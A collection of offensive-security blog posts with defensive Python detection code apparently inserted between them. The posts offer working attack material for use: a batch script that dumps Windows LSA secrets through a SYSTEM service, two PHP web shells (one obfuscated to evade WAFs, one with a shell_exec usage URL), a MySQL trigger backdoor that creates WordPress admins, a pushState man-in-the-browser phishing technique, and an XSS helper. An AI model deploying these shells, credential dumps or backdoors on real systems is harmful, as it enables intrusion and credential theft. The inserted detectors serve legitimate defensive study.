LSA.bat

The other day I found myself in the situation where I had to access my LSA (Local Security Authority) secrets on my Windows box.

For those of you who don't know what it is, let me quote Microsoft:

“The Local Security Authority (LSA) is a protected subsystem of Windows that maintains information about all aspects of local security on a system, collectively known as the local security policy of the system. In addition to housing policy information, the LSA provides services for translation between names and security identifiers (SIDs).” – Microsoft.

Sadly, I'm also quite the tinfoil-hat type when it comes to shady password recovery tools.

So I read up on it, and here you go:
a small PoC which dumps your LSA secrets, written in Batch!


@echo off
@break off

rem Register a service whose "binary" is a registry export of the LSA secrets key.
rem Services run as SYSTEM, which is what makes the SECURITY hive readable.
sc create theif binpath= "regedt32 /E C:\lsa.reg HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets" type= own type= interact

rem Start it; the export runs as SYSTEM and writes C:\lsa.reg.
sc start theif
rem Poll until the dump file shows up.
:wait
if exist "C:\lsa.reg" (
  goto done
) else (
  goto wait
)
:done
rem Clean up the service and show the exported secrets.
sc delete theif
more C:\lsa.reg


…For the few of you who find yourselves in the same situation.

This is what it does:

  • Initializes a new Windows service (in order to export the keys).
  • Invokes the service (it runs as SYSTEM; that's the only way I could figure out to get at the registry hive).
  • Waits until the dump file is generated…
  • Opens it up in everyone's favourite pager, more.

It does of course require administrative privileges.
Simple and useful!
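The script above leaves a trace a defender can look for: a "service installed" record (Windows System log, Event ID 7045) whose image path is a registry-export command aimed at the SECURITY hive. The following is an added example, not part of the original post; the records are constructed to mimic the fields of that event, and a real deployment would feed the function rows from the event log or a SIEM instead.

```python
"""Spot a transient SYSTEM service installed to export LSA secrets.

Added example, not part of the original post. The sample records are
constructed to resemble Event ID 7045 fields (ServiceName, ImagePath,
ServiceType, StartType); they are not real log data.
"""
import re

# A registry editor invoked with the /E (export) switch ...
EXPORT_CMD = re.compile(r"\bregedi?t(?:32)?(?:\.exe)?\b.*?\s/e\b", re.I)
# ... whose target lives under HKLM\SECURITY (where Policy\Secrets sits).
SECURITY_HIVE = re.compile(r"\bHK(?:EY_LOCAL_MACHINE|LM)\\SECURITY\b", re.I)

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "theif",
     "ImagePath": r"regedt32 /E C:\lsa.reg HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets",
     "ServiceType": "user mode service", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "backupsvc",
     "ImagePath": r"regedit.exe /E C:\backup\app.reg HKEY_LOCAL_MACHINE\SOFTWARE\ExampleApp",
     "ServiceType": "user mode service", "StartType": "demand start"},
    {"EventID": 7036, "ServiceName": "theif", "ImagePath": "",
     "ServiceType": "", "StartType": ""},  # a state change, not an install
]


def is_lsa_export_service(event):
    """True for a 7045 record whose image path exports a key under HKLM\\SECURITY."""
    if event.get("EventID") != 7045:
        return False
    path = event.get("ImagePath", "")
    return bool(EXPORT_CMD.search(path) and SECURITY_HIVE.search(path))


def find_lsa_export_services(events):
    """Names of services whose installation record matches the pattern."""
    return [e["ServiceName"] for e in events if is_lsa_export_service(e)]


if __name__ == "__main__":
    for name in find_lsa_export_services(SAMPLE_EVENTS):
        print("suspicious service install:", name)
```

The third record shows why both patterns are required: a registry export of an application key is routine, while an export that names the SECURITY hive from inside a service is not. The 7036 record is ignored because only the install event carries the image path.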

You may download it here.

Enjoy!

HashDoS PoC

I was at the CCC congress (28C3) in Berlin recently, where the two researchers Alexander ‘alech’ Klink and Julian ‘zeri’ Wälde disclosed a DoS vulnerability affecting almost all programming languages in the way they use hash tables.

Funny thing is, most server technologies, PHP, ASP (.NET), Java variants, Python (Django) etc., all appear to be vulnerable to different variants of the attack.

It consists of abusing the hash table data structure(s) in a way which forces all the keys to generate the same hash (checksum), and by doing so placing all data in the same bucket(s).

Basically, you trigger the hash table's worst-case scenario.
…That takes CPU…

You may download their presentation here, in order to get a more in-depth explanation about their findings.

My fellow mates ‘sasha’ and ‘swestres’ started generating collisions for various languages; I took part in their research and made this PoC affecting the hashing algorithm DJBX33A used in PHP 5.

So here you go folks, no license, play with the PoC as you wish!
(It’s supposed to work with SSL and over Mono!)
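As an added example (not the PoC from the post, and not PHP's own fix), here is DJBX33A as PHP 5 computes it, together with the request-side check a WAF or application can make: count how many parameter names land on the same hash value. The colliding parameter names are constructed for the test and hard-coded; the threshold is an assumption.

```python
"""DJBX33A as used by PHP 5's hash tables, plus a request-side check for the
collision flood described above.

Added example, not the PoC from the post. The colliding parameter names
below are constructed test data; the threshold is an assumption.
"""
from collections import Counter


def djbx33a(key, bits=32):
    """Bernstein's 'times 33' hash: h = h*33 + c, starting from 5381.

    PHP 5 computes it in an unsigned long; the width is a parameter here
    because keys with equal polynomial value collide at any width.
    """
    h = 5381
    for c in key.encode("latin-1"):
        h = (h * 33 + c) & ((1 << bits) - 1)
    return h


def max_bucket_load(keys, table_size=None):
    """Largest number of keys sharing one bucket (or one raw hash value)."""
    counts = Counter(
        djbx33a(k) % table_size if table_size else djbx33a(k) for k in keys
    )
    return max(counts.values(), default=0)


def looks_like_hashdos(keys, max_collisions=4):
    """Flag a request whose parameter names collide more than a benign form would."""
    return max_bucket_load(keys) > max_collisions


# Constructed parameter names: all eight share one DJBX33A value, because the
# two-character blocks "Ez" and "FY" hash alike (69*33+122 == 70*33+89).
COLLIDING_KEYS = ["EzEzEz", "EzEzFY", "EzFYEz", "EzFYFY",
                  "FYEzEz", "FYEzFY", "FYFYEz", "FYFYFY"]
# Constructed ordinary form field names for comparison.
NORMAL_KEYS = ["user", "pass", "token", "page"]

if __name__ == "__main__":
    print("collisions among colliding keys:", max_bucket_load(COLLIDING_KEYS))
    print("flagged:", looks_like_hashdos(COLLIDING_KEYS))
    print("flagged (normal form):", looks_like_hashdos(NORMAL_KEYS))
```

A collision count is only one mitigation; PHP 5.3.9 introduced max_input_vars to cap the number of parsed request parameters outright, and other runtimes moved to randomised hash seeds so that colliding inputs cannot be precomputed.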

That's it!

Take care & happy new year!

Cheers!

Anti Alphanum PHP Shell

After my release of the Tiny PHP Shell, Mr. Gareth Heyes @ The Spanner made a non-alphanumeric variant.
I got inspired by his nifty script and started researching further.

My main plan was to create an array of data with different values in order to have something to work with. So my first shot was this:

@$_[]=@!+_;

PHP will try to parse the bare underscore (green in the original colour coding) as a constant; when the interpreter is unable to find the constant it emits a notice. I suppress the notice using the ‘@’.

The “lost constant” is in turn converted to a string (string(1) “_”).

Just like Gareth Heyes, I used the plus operator (red) to cast the string to an integer (int(0)).

By prepending the exclamation mark (blue), the value 0 is cast to a boolean and negated (bool(true)).

So far so good! We have a boolean saying true!

I try to store it by pushing the value into the array $_ (yellow). However, that array doesn't exist yet.
By suppressing that too, PHP will automagically create it for you, and your value gets stored.

That's how I initialize my array. So, what do we do now?
Well, just like Mr. Gareth stated, if you access an array as a string in PHP,
it yields the string “Array”.

If we have a string, we can generate other strings out of it by (ab)using AND, OR and XOR.

I figured I had quite a few characters I could easily generate in PHP.
So I coded this fuzzer in VB.NET which permuted through AND, OR and XOR and gave me all the combinations that matched any letter in the words GET, POST and REQUEST. (Now that I think about it, I could have added COOKIE too…)

Nevertheless, my fuzzer (phpfuzz.vb) gave me the following results: fuzz_result.txt.

By analyzing the results, you'll notice we're able to generate all three of those methods using only a 15-character list.
But for the sake of clarity, I chose to go with GET.

By utilizing some boolean magic and variable dereferencing I ended up with this:

<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ //Fredrik N. Almroth – h.ackack.net
$_[$__+$__];$_[@-_]($_[@!+_]);
?>

…if WordPress tampered with the bytes, you may download it here.

The method of execution used in the Tiny PHP Shell and Gareth's shell remains the same.
But if you look at it, I added a few sneaky factors:

  1. No quotes! Quotes tend to trigger IDSes and WAFs.
  2. No use of functions.
  3. No strings.
  4. No numbers.
  5. No constants.

If you’re going to the Chaos Communication Congress – 28C3 (2011), then see you there!

Ciao.

Send POST data to an embedded iframe (jQuery/javascript)

Some time ago I needed a way, in JavaScript, to send POST data to a URL and load its response in an iframe. The response was application/pdf, and which PDF came back varied with the values I sent in the POST.
As simple as it sounds, it still took me some time to figure out, and no problem should have to be solved twice, so here is a little function which does this:

function loadFile(url){
	if(typeof(url)=='string'){
		// Create an iframe that will receive the response (e.g. the PDF)
		var file = document.createElement("iframe");
		$('body').append(file);
		// Build a POST form aimed at the URL; the hidden input carries the POST value
		var form = document.createElement("form");
		$(form).attr({"action":url,"method":"POST"});
		$(form).append($(document.createElement('input')).attr({"type":"hidden","name":"postKey","value":"postVal"}));
		// Put the form inside the iframe's document so the response loads there, then submit it
		$(file).contents().find('body').append(form);
		$(form).submit();
		return file;
	}else{
		return 1;
	}
}

This function can be useful when exploiting cross-site scripting vulnerabilities, or just for production use.

MySQL Backdoor

I shall now present a method which appears to be long forgotten.
I first stumbled upon it back in 2008, when the group VFH (Vuxna Förbannade Hackare) wreaked havoc on Swedish agencies and organizations.

Trigger based backdoors in MySQL.

  • So what are they?
    A trigger in MySQL acts as a callback which is executed before and/or after an UPDATE/INSERT finishes.
    Take this for example: a unicorn has played with a WordPress database.
    He inserted a trigger which interacts with a specific table, say wp_comments.
    When someone posts a comment, it gets inserted into wp_comments and the trigger is called.
  • What can you do with MySQL?
    Well, that depends on your permissions (obviously).
    But basically: tamper with tables.
  • So what can be done with WordPress?
    Say the unicorn made an evil trigger which modifies WordPress administrators whenever a specific comment is posted, so that the unicorn can add new admins (e.g. himself).
    If he then adds himself, he gets access to the WordPress plugin feature, which in turn allows him to upload an even more evil plugin (a PHP shell).
…and here I present a Proof-of-Concept…
My PoC basically consists of a single trigger with one big IF statement.

The main logic is triggered whenever a WordPress comment with the name set to Almroot is posted.

The trigger looks through all administrators in wp_users for any user with the name Almroot.
If no such user exists, it is added with full admin privileges; otherwise, its privileges are escalated to administrative and its password is restored.
The IP, User-Agent and other vital elements of the comment are nullified (the IP will point to localhost), and the comment is put in spam.
Once logged on to WordPress, you can simply upload whatever you want.
Just ZIP the files, and upload as a plugin.
You’ll find the files in: /wp-content/plugins/name-of-zip/your_file.whatever
Sounds bad, doesn't it?
There are a few drawbacks though:
  1. The DBMS has to be MySQL.
  2. The MySQL user you are able to tamper with needs to have Super_priv set to True (as of MySQL 5.1.6, Trigger_priv set to True).
  3. This trigger cannot be applied through a regular SQL injection, so don't try anything fishy!
A more extensive trigger can of course be crafted.
VFH’s PoC was able to read and write files for example.
In combination with raptor_udf.c, commands can be executed as well.

In order to determine whether you're infected or not, just take a look at the information_schema.triggers table.
Normally web-based CMSes won't use triggers, so if you find something in there, analyze it.
Be creative!
Don’t be cheap!
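To make the "look in information_schema.triggers" advice concrete, here is an added audit routine; it is not VFH's or the author's PoC. The rows are shaped like information_schema.TRIGGERS (the column names are MySQL's) but are constructed, and the backdoor body is a schematic placeholder rather than a working trigger. A DBA would run TRIGGER_QUERY and feed the result to audit_triggers().

```python
"""Audit the triggers in a WordPress database for the backdoor pattern above.

Added example, not VFH's or the author's PoC. The sample rows are constructed;
the "backdoor" body is schematic, with placeholders instead of real values.
"""
import re

# Query to pull every trigger in the current schema; column names are MySQL's.
TRIGGER_QUERY = """
SELECT TRIGGER_NAME, EVENT_MANIPULATION, EVENT_OBJECT_TABLE, ACTION_TIMING,
       DEFINER, ACTION_STATEMENT
FROM information_schema.TRIGGERS
WHERE TRIGGER_SCHEMA = DATABASE();
"""

# Tables a comment-triggered backdoor has to touch to mint an administrator.
SENSITIVE_TABLES = ("wp_users", "wp_usermeta")
# Data-modifying statements and the table they target.
WRITE_STMT = re.compile(r"\b(INSERT\s+INTO|UPDATE|DELETE\s+FROM)\s+`?(\w+)`?", re.I)
# An IF whose condition reads the submitted comment (the "magic comment" trigger).
COMMENT_BRANCH = re.compile(
    r"\bIF\b[^;]*\bNEW\.comment_(?:author|author_email|content)\b", re.I)

# Constructed rows (not from a real database).
SAMPLE_TRIGGERS = [
    {"TRIGGER_NAME": "wp_comments_ai", "EVENT_MANIPULATION": "INSERT",
     "EVENT_OBJECT_TABLE": "wp_comments", "ACTION_TIMING": "AFTER",
     "DEFINER": "root@localhost",
     "ACTION_STATEMENT": (
         "BEGIN IF NEW.comment_author = 'Almroot' THEN "
         "UPDATE wp_users SET user_pass = '<placeholder hash>' WHERE user_login = 'Almroot'; "
         "UPDATE wp_usermeta SET meta_value = '<placeholder>' WHERE user_id = 0; "
         "END IF; END")},
    {"TRIGGER_NAME": "wp_posts_audit", "EVENT_MANIPULATION": "UPDATE",
     "EVENT_OBJECT_TABLE": "wp_posts", "ACTION_TIMING": "AFTER",
     "DEFINER": "wpuser@localhost",
     "ACTION_STATEMENT":
         "INSERT INTO post_audit (post_id, changed_at) VALUES (NEW.ID, NOW())"},
]


def audit_trigger(row):
    """Reasons a trigger row looks like a comment-triggered backdoor (empty = none found)."""
    reasons = []
    body = row["ACTION_STATEMENT"]
    for verb, table in WRITE_STMT.findall(body):
        if table.lower() in SENSITIVE_TABLES:
            reasons.append(f"{' '.join(verb.upper().split())} on {table.lower()}")
    if COMMENT_BRANCH.search(body):
        reasons.append("branches on submitted comment fields")
    return reasons


def audit_triggers(rows):
    """Map every trigger name to its reasons; on a CMS schema any trigger deserves a look."""
    return {row["TRIGGER_NAME"]: audit_trigger(row) for row in rows}


def suspicious_triggers(rows):
    """Names of triggers with at least one reason, sorted."""
    return sorted(name for name, why in audit_triggers(rows).items() if why)


if __name__ == "__main__":
    for name, why in audit_triggers(SAMPLE_TRIGGERS).items():
        print(name, "->", why or "nothing flagged")
```

The benign audit trigger is still listed by audit_triggers() with an empty reason list, matching the advice above: on a CMS database the existence of any trigger is itself worth a look, and the reasons only rank which ones to read first.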

Reference: vfh-03.txt
Ciao!

The man in the browser and Phishing with legit URL’s

Hi there!

I have always been fascinated by the concept of a victim browsing around on a website not knowing that I can see everything he does, and all this from a simple XSS! After I stumbled upon a relatively new HTML5 function in the window.history object called “pushState”, I just had to make a proof of concept.

What does this function do?

Well, it's made for manipulating the browser history, and it also lets you tamper with the URL bar: if you for example load “myajaxsite/asd.php” with AJAX you could show “myajaxsite/#asd” in the URL. This means we can manipulate the URL to whatever we want, since the function doesn't even force us to make a request to the new URL; it just pushes an item into the history and changes the URL.

How can we exploit this?

There are two scenarios I have come up with; let's start with the simple one: how to use this in a phishing attack.

  1. An attacker has an XSS on facebook.com/somepath/someotherpath/blabla/uglylongpath?xss=hello
  2. The attacker injects a script into the victim's browser that uses the history.pushState function to spoof the URL to facebook.com/login.php. This causes the URL bar to display http://facebook.com/login.php, but won't make the browser load login.php or even check that it exists.
  3. The victim follows the link; it looks like he has to log in to see this content. He is a bit suspicious, so he checks the source code for malicious stuff but finds nothing, since he is looking at the source code of facebook.com/login.php instead of the attacker's URL.
  4. The victim logs in, and the attacker steals the form data.

Pretty straight-forward scenario, don’t you think?

But that’s boring. Let’s take it to the not-so-straight-forward scenario, the man-in-the-browser.

So, what exactly IS a man-in-the-browser attack? Here’s a short description from OWASP:

The Man-in-the-Browser attack is the same approach as Man-in-the-middle attack, but in this case a Trojan Horse is used to intercept and manipulate calls between the main application’s executable (ex: the browser) and its security mechanisms or libraries on-the-fly.

Basically, I wrote a PoC on this concept… :)

The PoC is pretty straightforward: it hooks all links and forms and prevents them from navigating away; instead we load the page with AJAX and spoof the URL with the history.pushState method.

If we “misuse” CORS (Cross-Origin Resource Sharing), we can have the control center and log at some other domain.

Of course, we cannot load resources cross-domain by default, so if we fail to load a resource we will just use the window.open() method instead. :)

So, what if the victim uses the back button in his browser? For this I found another nifty method: when you go back in your browser history, a window.onpopstate event fires, so we can load the previous resource and show it to the user instead.

To sum up, the only way to really “get away” from this evil hook is to enter another URL in the URL bar and navigate away. Of course NoScript will prevent these kinds of attacks, but that is not relevant. Is there any fast way to know you are affected by an attack like this? No, at least not that I know of. Normally you could identify it by malicious-looking links, the URL bar not changing, or viewing the source, but all of these are void if the attacker uses these methods.

…And for you who wish to test this out, here is the PoC: MITB.zip

In fact, I encourage you to try it out, it’s pretty creepy!

Cheers!

Update: This is now part of the BeEF framework!

Tiny PHP Shell

Have you ever needed a small shell written in PHP?
Of course you have. But I bet it hasn't been all that stealthy!

This is really pointless, but someone might be interested in it.
So here you go folks!

<?=($_=@$_GET[2]).@$_($_GET[1])?>

It doesn’t look like much so let me explain.

PHP allows strings to be interpreted as function calls.
That’s a major part on how callbacks in PHP work.

Example:

<?

$array = array(1,2,3);

array_walk($array, 'f');

function f($x){echo $x * 2;}

?>

What the example above does is this: array_walk() iterates through the array $array and applies the function f() to each and every element in the list.
The function f() prints the value from the array multiplied by two.
The output is: 246.

The fun thing is, if you look at how the callback f() is applied, it's by a simple string (look at argument #2 of the first function, array_walk()).

What does that mean?
Well, to put it short: you're able to take a string and execute it as a function name.
Now, let's try something… fuzzier.

<?

$fuzz = 'phpinfo';

$fuzz();

?>

What might this do?
Will it execute?
Damn right.

Now let’s tear my tiny code apart.
It’s made out of two parts.

  1. $_=@$_GET[2]
  2. @$_($_GET[1])

The first part takes the value from the GET variable 2 and stores it in the temporary variable $_.
The second part takes our temporary variable $_ and executes it with the GET variable 1 as its one and only argument.

The @‘s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.
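Both this shell and the non-alphanumeric variant in the Anti Alphanum PHP Shell post above are small enough to look at statically, and they fail different checks. The following is an added example, not code from either post: one signature for "a request value used as a function name" (which catches the tiny shell) and one character-class statistic (which catches the non-alphanumeric variant, whose whole point is that it carries no strings, numbers or function names for a signature to match). The threshold is an assumption, and the benign page used for comparison is constructed.

```python
"""Static checks for the two shells shown in these posts.

Added example, not code from the original posts. The threshold below is an
assumption; the benign page is constructed for comparison.
"""
import re

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)"
# $_GET['f'](...) : a request value called directly as a function.
DIRECT_CALL = re.compile(SUPERGLOBAL + r"\s*\[[^\]]*\]\s*\(")
# $x = @$_GET['f'] : a request value parked in a variable (group 1 = the variable).
ASSIGN_FROM_REQUEST = re.compile(
    r"(\$[A-Za-z_][A-Za-z0-9_]*)\s*=\s*@?" + SUPERGLOBAL + r"\s*\[")


def strip_php_comments(code):
    """Drop /* */ and // or # comments (heuristic: ignores comment markers inside strings)."""
    code = re.sub(r"/\*.*?\*/", "", code, flags=re.S)
    return re.sub(r"(?://|#)[^\n]*", "", code)


def variable_function_calls(code):
    """Variables assigned from a request superglobal and later called as functions."""
    hits = []
    for m in ASSIGN_FROM_REQUEST.finditer(code):
        var = m.group(1)
        if re.search(re.escape(var) + r"\s*\(", code[m.end():]):
            hits.append(var)
    return hits


def alnum_ratio(code):
    """Share of non-whitespace characters that are letters or digits."""
    chars = [c for c in code if not c.isspace()]
    return sum(c.isalnum() for c in chars) / len(chars) if chars else 0.0


def scan_php(code, min_alnum_ratio=0.2):
    """Findings for one PHP source text; an empty list means nothing matched."""
    findings = []
    stripped = strip_php_comments(code)
    if DIRECT_CALL.search(stripped):
        findings.append("request value called directly as a function")
    for var in variable_function_calls(stripped):
        findings.append(f"{var} is assigned from a request value and then called")
    ratio = alnum_ratio(stripped)
    if ratio < min_alnum_ratio:
        findings.append(f"alphanumeric ratio {ratio:.2f} below {min_alnum_ratio}")
    return findings


# The two shells from the posts, as scan input.
TINY_SHELL = "<?=($_=@$_GET[2]).@$_($_GET[1])?>"
ANTI_ALPHANUM_SHELL = """<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ //Fredrik N. Almroth - h.ackack.net
$_[$__+$__];$_[@-_]($_[@!+_]);
?>"""
# Constructed benign page for comparison.
BENIGN_PAGE = """<?php
$name = isset($_GET['name']) ? $_GET['name'] : 'world';
echo 'Hello, ' . htmlspecialchars($name);
?>"""

if __name__ == "__main__":
    for label, src in [("tiny", TINY_SHELL), ("anti-alphanum", ANTI_ALPHANUM_SHELL),
                       ("benign", BENIGN_PAGE)]:
        print(label, "->", scan_php(src) or "clean")
```

The signature finds the tiny shell and misses the non-alphanumeric one entirely, which is exactly the evasion that post lists (no quotes, no function names, no strings, no numbers). What that design gives away instead is the statistic: once comments are stripped, a PHP file with zero letters or digits among hundreds of operators has no legitimate reason to exist, so the ratio check catches it without any signature.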

Conclusion: copy and paste the snippet, and store it in a PHP file.
Execute a shell by going to: copypaste.php?2=shell_exec&1=whoami

The response should be something like:
apache
…or, on Windows if you're running your server as a service:
nt authority\system

Conclusion; PHP is fun!

Ciao!